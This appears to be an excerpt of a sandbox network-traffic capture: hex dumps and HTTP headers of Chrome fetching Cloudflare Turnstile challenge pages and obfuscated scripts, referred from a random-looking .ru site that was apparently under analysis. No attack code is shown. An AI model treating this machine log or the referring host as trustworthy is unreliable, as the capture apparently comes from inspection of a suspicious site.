                                                                                                                              2024-12-04 20:16:03 UTC1369INData Raw: 73 2c 6e 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28
                                                                                                                              Data Ascii: s,n);var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(
                                                                                                                              2024-12-04 20:16:03 UTC1369INData Raw: 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74
                                                                                                                              Data Ascii: cument.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.st


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              12192.168.2.449756104.18.94.414433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:16:03 UTC798OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/15pl4/0x4AAAAAAA0qpC5c45_RMlWM/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                              Sec-Fetch-Dest: iframe
                                                                                                                              Referer: https://h6n.xswpbsmx.ru/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-12-04 20:16:03 UTC1362INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 04 Dec 2024 20:16:03 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Content-Length: 26460
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                              permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                              content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                                              cross-origin-embedder-policy: require-corp
                                                                                                                              cross-origin-opener-policy: same-origin
                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                              origin-agent-cluster: ?1
                                                                                                                              accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                              critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                              referrer-policy: same-origin
                                                                                                                              document-policy: js-profiling
                                                                                                                              2024-12-04 20:16:03 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 65 63 65 37 38 64 37 37 66 65 61 38 63 39 35 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: Server: cloudflareCF-RAY: 8ece78d77fea8c95-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                              2024-12-04 20:16:03 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                              2024-12-04 20:16:03 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                                                              Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                                                                              2024-12-04 20:16:03 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                                                              Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                                                              2024-12-04 20:16:03 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                                                                              Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                                                                              2024-12-04 20:16:03 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                                                                              Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                                                                              2024-12-04 20:16:03 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                                                                              Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                                                                              2024-12-04 20:16:03 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                                                                              Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                                                                              2024-12-04 20:16:03 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                                                                              Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                                                                              2024-12-04 20:16:03 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                                                              Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              13192.168.2.449758104.18.94.414433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:16:05 UTC730OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8ece78d77fea8c95&lang=auto HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/15pl4/0x4AAAAAAA0qpC5c45_RMlWM/auto/fbE/normal/auto/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-12-04 20:16:05 UTC331INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 04 Dec 2024 20:16:05 GMT
                                                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                                                              Content-Length: 125773
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8ece78e2ce4242cd-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-12-04 20:16:05 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 45 73 73 58 42 30 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32
                                                                                                                              Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.EssXB0={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
                                                                                                                              2024-12-04 20:16:05 UTC1369INData Raw: 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 63 68 65 63 6b 5f 64 65 6c 61 79 73 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25
                                                                                                                              Data Ascii: le_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%
                                                                                                                              2024-12-04 20:16:05 UTC1369INData Raw: 2c 67 36 2c 67 37 2c 67 62 2c 67 63 2c 67 64 2c 67 65 2c 67 68 2c 67 69 2c 67 66 2c 67 67 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 36 36 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 35 32 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 31 31 29 29 2f 33 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 34 30 35 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 34 35 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 36 32 29 29 2f 36 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 37 34 39 29 29 2f 37 2a 28 2d 70 61 72 73 65 49 6e 74 28
                                                                                                                              Data Ascii: ,g6,g7,gb,gc,gd,ge,gh,gi,gf,gg){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1466))/1*(-parseInt(gI(552))/2)+-parseInt(gI(1211))/3*(parseInt(gI(405))/4)+parseInt(gI(1145))/5+-parseInt(gI(1562))/6+-parseInt(gI(749))/7*(-parseInt(
                                                                                                                              2024-12-04 20:16:05 UTC1369INData Raw: 69 74 63 68 28 6a 5b 6b 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 6c 3d 67 65 5b 67 4d 28 34 35 35 29 5d 28 46 29 5b 67 4d 28 38 39 37 29 5d 28 27 2b 27 2c 67 4d 28 31 33 31 39 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 6d 3d 67 4d 28 31 34 32 36 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 6e 3d 68 7c 7c 67 4d 28 32 36 39 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 66 5b 67 4d 28 31 34 38 30 29 5d 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 3f 66 5b 67 4d 28 31 34 38 30 29 5d 3d 4a 53 4f 4e 5b 67 4d 28 31 36 37 33 29 5d 28 66 5b 67 4d 28 31 34 38 30 29 5d 2c 4f 62 6a 65 63 74 5b 67 4d 28 37 34 37 29 5d 28 66 5b 67 4d 28 31 34 38 30 29 5d 29 29 3a 66 5b 67 4d 28 31 34 38 30 29 5d 3d 4a 53 4f 4e 5b 67 4d 28 31 36
                                                                                                                              Data Ascii: itch(j[k++]){case'0':l=ge[gM(455)](F)[gM(897)]('+',gM(1319));continue;case'1':m=gM(1426);continue;case'2':n=h||gM(269);continue;case'3':f[gM(1480)]instanceof Error?f[gM(1480)]=JSON[gM(1673)](f[gM(1480)],Object[gM(747)](f[gM(1480)])):f[gM(1480)]=JSON[gM(16
